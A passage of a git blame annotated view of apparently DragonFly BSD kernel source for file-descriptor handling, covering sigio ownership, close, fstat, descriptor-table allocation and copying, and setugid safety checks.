content
stringlengths 228
999k
| pred_label
stringclasses 1
value | pred_score
float64 0.5
1
|
---|---|---|
This image could feature both the Vive Cosmos Elite and the Samsung HMD Odyssey+ side by side, with each headset worn by a person immersed in VR gaming. The background could be a split-screen, showcasing the unique gaming environments of each headset. This image would visually represent the article's focus on comparing the two VR systems, highlighting their immersive experiences.
Vive Cosmos Elite vs. Samsung HMD Odyssey+
There’s always been fierce competition in the virtual reality gaming market, and two of the most prominent players in this field are the Vive Cosmos Elite and the Samsung HMD Odyssey+. These headsets offer a unique and immersive gaming experience, but which one stands out? This article will compare these two VR powerhouses in-depth, analyzing their key features, specs, user experiences, and pricing.
Show a dynamic scene of a virtual reality gaming battle between two players, one wearing the Vive Cosmos Elite and the other wearing the Samsung HMD Odyssey+. Illustrate the competitive nature of the VR gaming market by having the players engaged in an intense game. This image would emphasize the comparison aspect of the article, showcasing the headsets in action.
What is Virtual Reality Gaming?
Virtual reality gaming is a form of gaming that utilizes virtual reality technology to create a fully immersive 3D gaming environment. It’s a revolutionary way to play, allowing gamers to step inside their favorite games and interact with them in ways that were once only possible in science fiction. The player is typically immersed in the game using a head-mounted display (HMD) and motion-tracking technology, which responds to the player’s movements and adjusts the game environment accordingly.
The beauty of VR gaming is its ability to create a sense of presence, making you feel as if you’re truly inside the game world. It’s not just about seeing a game on a screen; it’s about being part of it. This level of immersion can lead to incredibly realistic and intense gaming experiences that traditional video games can’t match.
Overview of Vive Cosmos Elite
The Vive Cosmos Elite is a high-end VR headset developed by HTC. It’s designed to offer a premium VR experience with high-resolution screens, a wide field of view, and precise motion tracking. The Cosmos Elite is a standalone headset, meaning it doesn’t require a PC. Instead, it uses a smartphone to power the VR experience.
The headset is comfortable, with adjustable straps and a soft face cushion. It also includes built-in headphones for an immersive audio experience. With the Vive Cosmos Elite, you’re not just playing a game but stepping inside it.
Overview of Samsung HMD Odyssey+
The Samsung HMD Odyssey+ is another top-tier VR offering from a well-known electronics brand. Like the Vive Cosmos Elite, it’s a standalone headset utilizing a PC to power its virtual reality experience. The Odyssey+ boasts incredible visual fidelity, with a high resolution, wide field of view, and anti-screen door effect technology that minimizes visual noise.
The Odyssey+ is notable for its comfort, adjustable headband, and lightweight design. It also includes built-in AKG headphones for high-quality audio and has integrated voice command functionality. The Samsung HMD Odyssey+ delivers a high-quality, immersive VR experience.
Key Features of Vive Cosmos Elite
The Vive Cosmos Elite boasts several impressive features. Firstly, it offers a high resolution of 2880 x 1700 pixels, providing crisp and clear visuals. It also has a wide 110-degree field of view, allowing for a more immersive gaming experience. Another standout feature is the headset’s precise motion tracking. The Cosmos Elite uses SteamVR Tracking technology, providing 360-degree tracking and sub-millimeter precision. This means your movements in the real world translate accurately into the virtual world.
Key Features of Samsung HMD Odyssey+
The Samsung HMD Odyssey+ also has an array of impressive features. It offers a high resolution of 2880 x 1600 pixels and a wide 110-degree field of view. A bonus is its anti-screen door effect technology, which reduces visual noise and creates a more immersive experience.
The Odyssey+ also has excellent motion tracking, using Inside-Out Position tracking. This removes the need for external sensors, making the setup process simpler and more user-friendly. Additionally, the headset includes integrated voice command functionality, allowing for hands-free control.
Comparing the Specs: Vive Cosmos Elite vs. Samsung HMD Odyssey+
When looking at the specs, both the Vive Cosmos Elite and the Samsung HMD Odyssey+ are quite similar. They both offer high-resolution displays and wide fields of view. However, the Cosmos Elite has a slightly higher resolution, which could lead to sharper visuals.
In terms of tracking, both headsets offer precise motion tracking, but they use different technologies. The Cosmos Elite uses SteamVR Tracking, while the Odyssey+ uses Inside-Out Position tracking. The choice between these could come down to personal preference, as some users may prefer the simplicity of Inside-Out tracking, while others might prefer the precision of SteamVR.
User Experience: Vive Cosmos Elite vs. Samsung HMD Odyssey+
The user experience is a crucial factor in any VR headset. The Vive Cosmos Elite and the Samsung HMD Odyssey+ provide a comfortable fit with adjustable straps and soft cushions. However, some users have reported that the Cosmos Elite is slightly more comfortable due to its lighter weight. Regarding gameplay, both headsets offer immersive experiences with high-quality visuals and sound. However, the Cosmos Elite’s slightly higher resolution and SteamVR tracking could provide a slightly more immersive experience.
Pricing: Vive Cosmos Elite vs. Samsung HMD Odyssey+
Price is a significant factor when choosing a VR headset. The Vive Cosmos Elite is generally more expensive than the Samsung HMD Odyssey+. However, considering its higher resolution and advanced tracking technology, some might argue that the additional cost is justified.
Final Verdict: Which is better – Vive Cosmos Elite or Samsung HMD Odyssey+
Choosing between the Vive Cosmos Elite and the Samsung HMD Odyssey+ is difficult, as both are excellent VR headsets with similar specs and features. However, if price is a significant factor, the Samsung HMD Odyssey+ might be the better choice. If you’re looking for the highest resolution and most precise tracking, the Vive Cosmos Elite might be worth the extra investment.
Create a visually appealing graphic that overlays key technical specifications and features of both headsets onto an image of a virtual reality environment.
Use icons and text to highlight the differences in resolution, field of view, tracking technology, and other important specs. This image would serve as an informative visual aid, helping readers quickly grasp the technical distinctions between the two VR systems.
Conclusion
The Vive Cosmos Elite and the Samsung HMD Odyssey+ are both formidable contenders in the VR gaming market. They each offer unique advantages, with the Cosmos Elite boasting higher resolution and advanced tracking technology and the Odyssey+ offering a more affordable price point. Ultimately, the choice between the two will depend on your specific needs and preferences.
Frequently Asked Questions:
Do I need a powerful PC for VR gaming?
Yes, VR gaming typically requires a powerful PC with a robust graphics card to run smoothly.
Can I use these VR headsets with glasses?
Yes, the Vive Cosmos Elite and the Samsung HMD Odyssey+ are designed to accommodate users wearing glasses.
Are these VR headsets wireless?
No, the Vive Cosmos Elite and the Samsung HMD Odyssey+ require a wired connection to a PC or smartphone.
How long can I play VR games without feeling tired or dizzy?
This varies from person to person.
Can I use these VR headsets for non-gaming purposes?
Both headsets can be used for various applications, including virtual tours, simulations, and educational programs.
|
__label__pos
| 0.918596 |
Android Studio
Android Studio Ders 8 - Random Fonksiyon Kullanımı
10 Mayıs 2020 Pazar Adem KORKMAZ 1226
Android Studio Ders 8 - Random Fonksiyon Kullanımı
Android Studio Math sınıfına ait Random Fonksiyonu kullanarak rastgele üretilen sayının Faktöriyelinin hesaplanması uygulaması. Sayısal loto şans çekilişleri için en çok kullanılan yöntemlerin başında gelmektedir. Bu video ile bunu çok rahat mobil uygulama olarak yapabilceksiniz
Layout Tasarımı
Faktöriyel Hesaplama Uygulaması
public class MainActivity extends AppCompatActivity {
TextView sayi,fak;
Button btn;
Spinner kitaList;
@Override
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); tanimlama(); // btn.setOnClickListener(new View.OnClickListener() { @Override
public void onClick(View v) { int rndSayi= (int) (Math.random()*100+1); sayi.setText(" "+(rndSayi)); fakHesapla(rndSayi); } }); } //Faktöriyelin hesaplandığı fonksiyon public void fakHesapla(int a) { double sonuc=1; for(int i=1;i<=a;i++) { sonuc=sonuc*i; } fak.setText(" "+(sonuc)); } //nesnelerin tanımlandığı fonksiyon public void tanimlama() { sayi=findViewById(R.id.urtSayi); fak=findViewById(R.id.fakt); btn=findViewById(R.id.btn); } }
Android Studio ile Faktöriyel Hesaplama Uygulaması
Android Studio ile Random Sayı Üretme
Yorumlar
Yorum Yap
Yukarı Kaydır
|
__label__pos
| 0.73776 |
Suggestion
Give the general solutions of the following equations
1. \(2\sin 3\theta - 7 \cos 2\theta + \sin \theta + 1 = 0\),
How might we reduce the number of different multiples of \(\theta\)?
Can we turn the LHS into a function of \(\sin \theta\) alone, or of \(\cos \theta\) alone?
1. \(\cos\theta - \sin 2\theta + \cos 3\theta - \sin 4\theta = 0\).
How can we simplify an expression like \(\cos A + \cos B\)? Are there any identities that could help us?
|
__label__pos
| 1 |
2
$\begingroup$
Let $k$ be a field, and $f:k[x_1,\ldots,x_n]\to k[y_1,\ldots,y_m]$ a $k$-algebra homomorphism. Given $r_1,\ldots,r_k\in k[y_1,\ldots,y_m]$, is there an algorithm for producing a finite generating set for the ideal $f^{-1}((r_1,\ldots,r_k))$?
$\endgroup$
• 2
$\begingroup$ I wonder if there is even a reasonable algorithm for finding generators of $f^{-1}(0)$. $\endgroup$ – Thomas Andrews Jul 18 '13 at 16:42
• $\begingroup$ Will Grobner bases help? $\endgroup$ – Robert Lewis Jul 18 '13 at 17:37
0
$\begingroup$
The answer is yes. The question is asking to compute the kernel of
$$f : k[x_1, \dots, x_n] \rightarrow S$$
where $S$ is some quotient of a polynomial ring. Macaulay2 can calculate such a kernel.
$\endgroup$
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.746397 |
Stack Overflow is a community of 4.7 million programmers, just like you, helping each other.
Join them; it only takes a minute:
Sign up
Join the Stack Overflow community to:
1. Ask programming questions
2. Answer and help your peers
3. Get recognized for your expertise
This is a cppcheck warning message.
Variable 'BUFFER_INFO' hides typedef with same name
The BUFFER_INFO is defined as following.
typedef struct tagBufferInfo
{
CRITICAL_SECTION cs;
Buffer* pBuffer1;
Buffer* pBuffer2;
Buffer* pLoggingBuffer;
Buffer* pSendingBuffer;
}BUFFER_INFO, *PBUFFER_INFO;
And I wrote,
PBUFFER_INFO p = new BUFFER_INFO; // causes the warning.
What is the problem? How do I solve it?
Thanks.
share|improve this question
up vote 4 down vote accepted
This looks like it might be a cppcheck bug.
However... what you have written is bad C++ style, prefer:
struct BUFFER_INFO
{
CRITICAL_SECTION cs;
Buffer* pBuffer1;
Buffer* pBuffer2;
Buffer* pLoggingBuffer;
Buffer* pSendingBuffer;
};
I would also obsrve that it is not good C++ style to use all uppercase for type names (these are normally reserved for constants) and that typedefs that hide the fact that something is a pointer are normally not a good idea.
share|improve this answer
In C++ you can direcly use the Struct name without keyword struct and so you dont need the first typedef that is BUFFER_INFO. But for pointer you can still have it.
share|improve this answer
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.703674 |
public UI.Selectable FindSelectable (Vector3 dir);
パラメーター
dir近くにある Selectable オブジェクトを検索する方向
戻り値
Selectable 近くの Selectable オブジェクト 見つからない場合は null を返します
説明
この次の Selectable オブジェクトを一つ検索します
移動する向きは vector3 型の変数で決められます。
using UnityEngine;
using System.Collections;
using UnityEngine.UI; // required when using UI elements in scripts
public class ExampleClass : MonoBehaviour { //Sets the direction as "Up" (Y is in positive). public Vector3 direction = new Vector3(0, 1, 0); public Button btnMain;
public void Start() { //Finds and assigns the selectable above the main button Selectable newSelectable = btnMain.FindSelectable(direction);
Debug.Log(newSelectable.name); } }
|
__label__pos
| 0.707872 |
The recent file descriptor work is significant enough to deserve a
[dragonfly.git] / sys / kern / kern_descrip.c
CommitLineData
984263bc 1/*
29d211fb
MD
2 * Copyright (c) 2005 The DragonFly Project. All rights reserved.
3 *
4 * This code is derived from software contributed to The DragonFly Project
5 * by Jeffrey Hsu.
6 *
7 * Redistribution and use in source and binary forms, with or without
8 * modification, are permitted provided that the following conditions
9 * are met:
10 *
11 * 1. Redistributions of source code must retain the above copyright
12 * notice, this list of conditions and the following disclaimer.
13 * 2. Redistributions in binary form must reproduce the above copyright
14 * notice, this list of conditions and the following disclaimer in
15 * the documentation and/or other materials provided with the
16 * distribution.
17 * 3. Neither the name of The DragonFly Project nor the names of its
18 * contributors may be used to endorse or promote products derived
19 * from this software without specific, prior written permission.
20 *
21 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
22 * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
23 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
24 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
25 * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
26 * INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING,
27 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
28 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
29 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
30 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
31 * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
32 * SUCH DAMAGE.
33 *
34 *
984263bc
MD
35 * Copyright (c) 1982, 1986, 1989, 1991, 1993
36 * The Regents of the University of California. All rights reserved.
37 * (c) UNIX System Laboratories, Inc.
38 * All or some portions of this file are derived from material licensed
39 * to the University of California by American Telephone and Telegraph
40 * Co. or Unix System Laboratories, Inc. and are reproduced herein with
41 * the permission of UNIX System Laboratories, Inc.
42 *
43 * Redistribution and use in source and binary forms, with or without
44 * modification, are permitted provided that the following conditions
45 * are met:
46 * 1. Redistributions of source code must retain the above copyright
47 * notice, this list of conditions and the following disclaimer.
48 * 2. Redistributions in binary form must reproduce the above copyright
49 * notice, this list of conditions and the following disclaimer in the
50 * documentation and/or other materials provided with the distribution.
51 * 3. All advertising materials mentioning features or use of this software
52 * must display the following acknowledgement:
53 * This product includes software developed by the University of
54 * California, Berkeley and its contributors.
55 * 4. Neither the name of the University nor the names of its contributors
56 * may be used to endorse or promote products derived from this software
57 * without specific prior written permission.
58 *
59 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
60 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
61 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
62 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
63 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
64 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
65 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
66 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
67 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
68 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
69 * SUCH DAMAGE.
70 *
71 * @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
c4cb6d8b 72 * $FreeBSD: src/sys/kern/kern_descrip.c,v 1.81.2.19 2004/02/28 00:43:31 tegge Exp $
29d211fb 73 * $DragonFly: src/sys/kern/kern_descrip.c,v 1.45 2005/06/22 19:58:44 dillon Exp $
984263bc
MD
74 */
75
76#include "opt_compat.h"
77#include <sys/param.h>
78#include <sys/systm.h>
79#include <sys/malloc.h>
80#include <sys/sysproto.h>
81#include <sys/conf.h>
82#include <sys/filedesc.h>
83#include <sys/kernel.h>
84#include <sys/sysctl.h>
85#include <sys/vnode.h>
86#include <sys/proc.h>
fad57d0e 87#include <sys/nlookup.h>
984263bc
MD
88#include <sys/file.h>
89#include <sys/stat.h>
90#include <sys/filio.h>
91#include <sys/fcntl.h>
92#include <sys/unistd.h>
93#include <sys/resourcevar.h>
94#include <sys/event.h>
dda4b42b 95#include <sys/kern_syscall.h>
1c55bd1c 96#include <sys/kcore.h>
7b124c9f 97#include <sys/kinfo.h>
984263bc
MD
98
99#include <vm/vm.h>
100#include <vm/vm_extern.h>
101
e43a034f 102#include <sys/thread2.h>
dadab5e9
MD
103#include <sys/file2.h>
104
984263bc
MD
105static MALLOC_DEFINE(M_FILEDESC, "file desc", "Open file descriptor table");
106static MALLOC_DEFINE(M_FILEDESC_TO_LEADER, "file desc to leader",
107 "file desc to leader structures");
108MALLOC_DEFINE(M_FILE, "file", "Open file structure");
109static MALLOC_DEFINE(M_SIGIO, "sigio", "sigio structures");
110
111static d_open_t fdopen;
112#define NUMFDESC 64
113
114#define CDEV_MAJOR 22
115static struct cdevsw fildesc_cdevsw = {
fabb8ceb
MD
116 /* name */ "FD",
117 /* maj */ CDEV_MAJOR,
118 /* flags */ 0,
119 /* port */ NULL,
455fcd7e 120 /* clone */ NULL,
fabb8ceb 121
984263bc
MD
122 /* open */ fdopen,
123 /* close */ noclose,
124 /* read */ noread,
125 /* write */ nowrite,
126 /* ioctl */ noioctl,
127 /* poll */ nopoll,
128 /* mmap */ nommap,
129 /* strategy */ nostrategy,
984263bc 130 /* dump */ nodump,
fabb8ceb 131 /* psize */ nopsize
984263bc
MD
132};
133
402ed7e1
RG
134static int badfo_readwrite (struct file *fp, struct uio *uio,
135 struct ucred *cred, int flags, struct thread *td);
136static int badfo_ioctl (struct file *fp, u_long com, caddr_t data,
137 struct thread *td);
138static int badfo_poll (struct file *fp, int events,
139 struct ucred *cred, struct thread *td);
140static int badfo_kqfilter (struct file *fp, struct knote *kn);
141static int badfo_stat (struct file *fp, struct stat *sb, struct thread *td);
142static int badfo_close (struct file *fp, struct thread *td);
984263bc
MD
143
144/*
145 * Descriptor management.
146 */
147struct filelist filehead; /* head of list of open files */
148int nfiles; /* actual number of open files */
149extern int cmask;
150
151/*
152 * System calls on descriptors.
153 */
984263bc
MD
154/* ARGSUSED */
155int
41c20dac 156getdtablesize(struct getdtablesize_args *uap)
984263bc 157{
41c20dac 158 struct proc *p = curproc;
984263bc 159
c7114eea 160 uap->sysmsg_result =
984263bc
MD
161 min((int)p->p_rlimit[RLIMIT_NOFILE].rlim_cur, maxfilesperproc);
162 return (0);
163}
164
165/*
166 * Duplicate a file descriptor to a particular value.
167 *
168 * note: keep in mind that a potential race condition exists when closing
169 * descriptors from a shared descriptor table (via rfork).
170 */
984263bc
MD
171/* ARGSUSED */
172int
41c20dac 173dup2(struct dup2_args *uap)
984263bc 174{
dda4b42b
DRJ
175 int error;
176
177 error = kern_dup(DUP_FIXED, uap->from, uap->to, uap->sysmsg_fds);
178
179 return (error);
984263bc
MD
180}
181
182/*
183 * Duplicate a file descriptor.
184 */
984263bc
MD
185/* ARGSUSED */
186int
41c20dac 187dup(struct dup_args *uap)
984263bc 188{
dda4b42b 189 int error;
984263bc 190
dda4b42b
DRJ
191 error = kern_dup(DUP_VARIABLE, uap->fd, 0, uap->sysmsg_fds);
192
193 return (error);
984263bc
MD
194}
195
984263bc 196int
dda4b42b 197kern_fcntl(int fd, int cmd, union fcntl_dat *dat)
984263bc 198{
dadab5e9
MD
199 struct thread *td = curthread;
200 struct proc *p = td->td_proc;
41c20dac
MD
201 struct filedesc *fdp = p->p_fd;
202 struct file *fp;
203 char *pop;
984263bc 204 struct vnode *vp;
984263bc 205 u_int newmin;
dda4b42b 206 int tmp, error, flg = F_POSIX;
984263bc 207
dadab5e9
MD
208 KKASSERT(p);
209
dda4b42b 210 if ((unsigned)fd >= fdp->fd_nfiles ||
0679adc4 211 (fp = fdp->fd_files[fd].fp) == NULL)
984263bc 212 return (EBADF);
0679adc4 213 pop = &fdp->fd_files[fd].fileflags;
984263bc 214
dda4b42b 215 switch (cmd) {
984263bc 216 case F_DUPFD:
dda4b42b 217 newmin = dat->fc_fd;
984263bc 218 if (newmin >= p->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
dda4b42b 219 newmin > maxfilesperproc)
984263bc 220 return (EINVAL);
dda4b42b
DRJ
221 error = kern_dup(DUP_VARIABLE, fd, newmin, &dat->fc_fd);
222 return (error);
984263bc
MD
223
224 case F_GETFD:
dda4b42b 225 dat->fc_cloexec = (*pop & UF_EXCLOSE) ? FD_CLOEXEC : 0;
984263bc
MD
226 return (0);
227
228 case F_SETFD:
229 *pop = (*pop &~ UF_EXCLOSE) |
dda4b42b 230 (dat->fc_cloexec & FD_CLOEXEC ? UF_EXCLOSE : 0);
984263bc
MD
231 return (0);
232
233 case F_GETFL:
dda4b42b 234 dat->fc_flags = OFLAGS(fp->f_flag);
984263bc
MD
235 return (0);
236
237 case F_SETFL:
238 fhold(fp);
239 fp->f_flag &= ~FCNTLFLAGS;
dda4b42b 240 fp->f_flag |= FFLAGS(dat->fc_flags & ~O_ACCMODE) & FCNTLFLAGS;
984263bc 241 tmp = fp->f_flag & FNONBLOCK;
dadab5e9 242 error = fo_ioctl(fp, FIONBIO, (caddr_t)&tmp, td);
984263bc 243 if (error) {
dadab5e9 244 fdrop(fp, td);
984263bc
MD
245 return (error);
246 }
247 tmp = fp->f_flag & FASYNC;
dadab5e9 248 error = fo_ioctl(fp, FIOASYNC, (caddr_t)&tmp, td);
984263bc 249 if (!error) {
dadab5e9 250 fdrop(fp, td);
984263bc
MD
251 return (0);
252 }
253 fp->f_flag &= ~FNONBLOCK;
254 tmp = 0;
dda4b42b 255 fo_ioctl(fp, FIONBIO, (caddr_t)&tmp, td);
dadab5e9 256 fdrop(fp, td);
984263bc
MD
257 return (error);
258
259 case F_GETOWN:
260 fhold(fp);
dda4b42b 261 error = fo_ioctl(fp, FIOGETOWN, (caddr_t)&dat->fc_owner, td);
dadab5e9 262 fdrop(fp, td);
984263bc
MD
263 return(error);
264
265 case F_SETOWN:
266 fhold(fp);
dda4b42b 267 error = fo_ioctl(fp, FIOSETOWN, (caddr_t)&dat->fc_owner, td);
dadab5e9 268 fdrop(fp, td);
984263bc
MD
269 return(error);
270
271 case F_SETLKW:
272 flg |= F_WAIT;
273 /* Fall into F_SETLK */
274
275 case F_SETLK:
276 if (fp->f_type != DTYPE_VNODE)
277 return (EBADF);
278 vp = (struct vnode *)fp->f_data;
279
280 /*
281 * copyin/lockop may block
282 */
283 fhold(fp);
dda4b42b
DRJ
284 if (dat->fc_flock.l_whence == SEEK_CUR)
285 dat->fc_flock.l_start += fp->f_offset;
984263bc 286
dda4b42b 287 switch (dat->fc_flock.l_type) {
984263bc
MD
288 case F_RDLCK:
289 if ((fp->f_flag & FREAD) == 0) {
290 error = EBADF;
291 break;
292 }
293 p->p_leader->p_flag |= P_ADVLOCK;
294 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_SETLK,
dda4b42b 295 &dat->fc_flock, flg);
984263bc
MD
296 break;
297 case F_WRLCK:
298 if ((fp->f_flag & FWRITE) == 0) {
299 error = EBADF;
300 break;
301 }
302 p->p_leader->p_flag |= P_ADVLOCK;
303 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_SETLK,
dda4b42b 304 &dat->fc_flock, flg);
984263bc
MD
305 break;
306 case F_UNLCK:
307 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_UNLCK,
dda4b42b 308 &dat->fc_flock, F_POSIX);
984263bc
MD
309 break;
310 default:
311 error = EINVAL;
312 break;
313 }
314 /* Check for race with close */
dda4b42b 315 if ((unsigned) fd >= fdp->fd_nfiles ||
0679adc4 316 fp != fdp->fd_files[fd].fp) {
dda4b42b
DRJ
317 dat->fc_flock.l_whence = SEEK_SET;
318 dat->fc_flock.l_start = 0;
319 dat->fc_flock.l_len = 0;
320 dat->fc_flock.l_type = F_UNLCK;
984263bc 321 (void) VOP_ADVLOCK(vp, (caddr_t)p->p_leader,
dda4b42b 322 F_UNLCK, &dat->fc_flock, F_POSIX);
984263bc 323 }
dadab5e9 324 fdrop(fp, td);
984263bc
MD
325 return(error);
326
327 case F_GETLK:
328 if (fp->f_type != DTYPE_VNODE)
329 return (EBADF);
330 vp = (struct vnode *)fp->f_data;
331 /*
332 * copyin/lockop may block
333 */
334 fhold(fp);
dda4b42b
DRJ
335 if (dat->fc_flock.l_type != F_RDLCK &&
336 dat->fc_flock.l_type != F_WRLCK &&
337 dat->fc_flock.l_type != F_UNLCK) {
dadab5e9 338 fdrop(fp, td);
984263bc
MD
339 return (EINVAL);
340 }
dda4b42b
DRJ
341 if (dat->fc_flock.l_whence == SEEK_CUR)
342 dat->fc_flock.l_start += fp->f_offset;
984263bc 343 error = VOP_ADVLOCK(vp, (caddr_t)p->p_leader, F_GETLK,
dda4b42b 344 &dat->fc_flock, F_POSIX);
dadab5e9 345 fdrop(fp, td);
984263bc
MD
346 return(error);
347 default:
348 return (EINVAL);
349 }
350 /* NOTREACHED */
351}
352
dda4b42b
DRJ
353/*
354 * The file control system call.
355 */
356int
357fcntl(struct fcntl_args *uap)
358{
359 union fcntl_dat dat;
360 int error;
361
362 switch (uap->cmd) {
363 case F_DUPFD:
364 dat.fc_fd = uap->arg;
365 break;
366 case F_SETFD:
367 dat.fc_cloexec = uap->arg;
368 break;
369 case F_SETFL:
370 dat.fc_flags = uap->arg;
371 break;
372 case F_SETOWN:
373 dat.fc_owner = uap->arg;
374 break;
375 case F_SETLKW:
376 case F_SETLK:
377 case F_GETLK:
378 error = copyin((caddr_t)uap->arg, &dat.fc_flock,
379 sizeof(struct flock));
380 if (error)
381 return (error);
382 break;
383 }
384
385 error = kern_fcntl(uap->fd, uap->cmd, &dat);
386
387 if (error == 0) {
388 switch (uap->cmd) {
389 case F_DUPFD:
390 uap->sysmsg_result = dat.fc_fd;
391 break;
392 case F_GETFD:
393 uap->sysmsg_result = dat.fc_cloexec;
394 break;
395 case F_GETFL:
396 uap->sysmsg_result = dat.fc_flags;
397 break;
398 case F_GETOWN:
399 uap->sysmsg_result = dat.fc_owner;
400 case F_GETLK:
401 error = copyout(&dat.fc_flock, (caddr_t)uap->arg,
402 sizeof(struct flock));
403 break;
404 }
405 }
406
407 return (error);
408}
409
984263bc
MD
410/*
411 * Common code for dup, dup2, and fcntl(F_DUPFD).
dda4b42b
DRJ
412 *
413 * The type flag can be either DUP_FIXED or DUP_VARIABLE. DUP_FIXED tells
414 * kern_dup() to destructively dup over an existing file descriptor if new
415 * is already open. DUP_VARIABLE tells kern_dup() to find the lowest
416 * unused file descriptor that is greater than or equal to new.
984263bc 417 */
dda4b42b
DRJ
418int
419kern_dup(enum dup_type type, int old, int new, int *res)
984263bc 420{
dda4b42b
DRJ
421 struct thread *td = curthread;
422 struct proc *p = td->td_proc;
423 struct filedesc *fdp = p->p_fd;
984263bc
MD
424 struct file *fp;
425 struct file *delfp;
426 int holdleaders;
69908319 427 boolean_t fdalloced = FALSE;
dda4b42b
DRJ
428 int error, newfd;
429
430 /*
431 * Verify that we have a valid descriptor to dup from and
432 * possibly to dup to.
433 */
434 if (old < 0 || new < 0 || new > p->p_rlimit[RLIMIT_NOFILE].rlim_cur ||
435 new >= maxfilesperproc)
436 return (EBADF);
0679adc4 437 if (old >= fdp->fd_nfiles || fdp->fd_files[old].fp == NULL)
dda4b42b
DRJ
438 return (EBADF);
439 if (type == DUP_FIXED && old == new) {
440 *res = new;
441 return (0);
442 }
0679adc4 443 fp = fdp->fd_files[old].fp;
dda4b42b
DRJ
444 fhold(fp);
445
446 /*
447 * Expand the table for the new descriptor if needed. This may
448 * block and drop and reacquire the fidedesc lock.
449 */
450 if (type == DUP_VARIABLE || new >= fdp->fd_nfiles) {
451 error = fdalloc(p, new, &newfd);
452 if (error) {
453 fdrop(fp, td);
454 return (error);
455 }
69908319 456 fdalloced = TRUE;
dda4b42b
DRJ
457 }
458 if (type == DUP_VARIABLE)
459 new = newfd;
460
461 /*
462 * If the old file changed out from under us then treat it as a
463 * bad file descriptor. Userland should do its own locking to
464 * avoid this case.
465 */
0679adc4
MD
466 if (fdp->fd_files[old].fp != fp) {
467 if (fdp->fd_files[new].fp == NULL) {
69908319
JH
468 if (fdalloced)
469 fdreserve(fdp, newfd, -1);
dda4b42b
DRJ
470 if (new < fdp->fd_freefile)
471 fdp->fd_freefile = new;
472 while (fdp->fd_lastfile > 0 &&
0679adc4 473 fdp->fd_files[fdp->fd_lastfile].fp == NULL)
dda4b42b
DRJ
474 fdp->fd_lastfile--;
475 }
476 fdrop(fp, td);
477 return (EBADF);
478 }
479 KASSERT(old != new, ("new fd is same as old"));
984263bc
MD
480
481 /*
482 * Save info on the descriptor being overwritten. We have
483 * to do the unmap now, but we cannot close it without
484 * introducing an ownership race for the slot.
485 */
0679adc4 486 delfp = fdp->fd_files[new].fp;
984263bc
MD
487 if (delfp != NULL && p->p_fdtol != NULL) {
488 /*
489 * Ask fdfree() to sleep to ensure that all relevant
490 * process leaders can be traversed in closef().
491 */
492 fdp->fd_holdleaderscount++;
493 holdleaders = 1;
494 } else
495 holdleaders = 0;
dda4b42b
DRJ
496 KASSERT(delfp == NULL || type == DUP_FIXED,
497 ("dup() picked an open file"));
984263bc 498#if 0
0679adc4 499 if (delfp && (fdp->fd_files[new].fileflags & UF_MAPPED))
984263bc
MD
500 (void) munmapfd(p, new);
501#endif
502
503 /*
504 * Duplicate the source descriptor, update lastfile
505 */
984263bc
MD
506 if (new > fdp->fd_lastfile)
507 fdp->fd_lastfile = new;
0679adc4 508 if (!fdalloced && fdp->fd_files[new].fp == NULL)
69908319 509 fdreserve(fdp, new, 1);
0679adc4
MD
510 fdp->fd_files[new].fp = fp;
511 fdp->fd_files[new].fileflags =
512 fdp->fd_files[old].fileflags & ~UF_EXCLOSE;
dda4b42b 513 *res = new;
984263bc
MD
514
515 /*
516 * If we dup'd over a valid file, we now own the reference to it
517 * and must dispose of it using closef() semantics (as if a
518 * close() were performed on it).
519 */
520 if (delfp) {
dadab5e9 521 (void) closef(delfp, td);
984263bc
MD
522 if (holdleaders) {
523 fdp->fd_holdleaderscount--;
524 if (fdp->fd_holdleaderscount == 0 &&
525 fdp->fd_holdleaderswakeup != 0) {
526 fdp->fd_holdleaderswakeup = 0;
527 wakeup(&fdp->fd_holdleaderscount);
528 }
529 }
530 }
531 return (0);
532}
533
534/*
535 * If sigio is on the list associated with a process or process group,
536 * disable signalling from the device, remove sigio from the list and
537 * free sigio.
538 */
539void
